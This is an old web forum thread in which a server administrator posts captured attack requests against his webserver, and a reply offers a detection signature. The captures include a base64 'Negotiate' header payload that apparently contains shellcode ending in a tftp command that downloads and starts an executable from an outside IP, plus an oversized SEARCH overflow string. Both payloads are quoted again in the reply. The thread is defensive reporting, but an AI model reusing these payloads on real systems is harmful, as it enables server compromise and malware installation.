 |
| Register | FAQ | Members List | Calendar | Links | Search | Today's Posts | Mark Forums Read |
|
||||||||
|
|
#1
07-14-2005, 01:24 PM
|
webserver attack attempt
I've got some people who are trying to attack my
webserver, which is not Apache. But I would guess they think it is, or perhaps they think it is M$. What they do is one of two things: either they will send an HTTP request that is far too short, or one that is far too long. An example of the long kind: GET / HTTP/1.0 Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQU FBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQQMAI4I MVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAd Af Byg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDM cBki0AwhcB4D4tADItwHK2LaAjpCwA AAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDcwLjI2LjI yOS4xMDQgR0VUIHdjbnNmdHkuZXhlJnN0YXJ0IHdjbnNmdHkuZ XhlJmV4aXQAQkJCQkJCQkJCQkJCQkJ .... and it goes on from there, beyond the maximum number of bytes that is allowed. Of course, this has no effect, because it's a well written server. But I suppose that if someone were to decode that string, they might find some runnable code in there. Another long one follows. Notice it is neither GET nor POST. SEARCH /.^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą ....etc. YF yarmfelder@yahoo.com 
|
|
#2
07-14-2005, 04:11 PM
|
|||
|
|||
|
Re: webserver attack attempt
Hope this is of help:
http://translate.google.com/translat...D%26safe%3Doff 2005/06/04 Attempt of cash server C -> S TCP 80 or 8080 ? " HTTP/1 " and " Authorization: Negotiate " and " YIIQegYGKwYBBQUCoIIQbjC$$C$$EGqhghBmI4IQYgcOcbaeaq ufbqufbquf " http://216.239.59.104/search?q=cache...hl=en&start=10 <(E-Mail Removed)> wrote in message news:(E-Mail Removed) oups.com... I've got some people who are trying to attack my webserver, which is not Apache. But I would guess they think it is, or perhaps they think it is M$. What they do is one of two things: either they will send an HTTP request that is far too short, or one that is far too long. An example of the long kind: GET / HTTP/1.0 Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQU FBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQQMAI4I MVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAd Af Byg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDM cBki0AwhcB4D4tADItwHK2LaAjpCwA AAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDcwLjI2LjI yOS4xMDQgR0VUIHdjbnNmdHkuZXhlJnN0YXJ0IHdjbnNmdHkuZ XhlJmV4aXQAQkJCQkJCQkJCQkJCQkJ .... and it goes on from there, beyond the maximum number of bytes that is allowed. Of course, this has no effect, because it's a well written server. But I suppose that if someone were to decode that string, they might find some runnable code in there. Another long one follows. Notice it is neither GET nor POST. SEARCH /.^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^ Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą ^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^Bą^B ą ....etc. YF
|
 |
| Tags |
| attack, attempt, webserver |
| Thread Tools | |
| Display Modes | |
|
|
Linear Mode
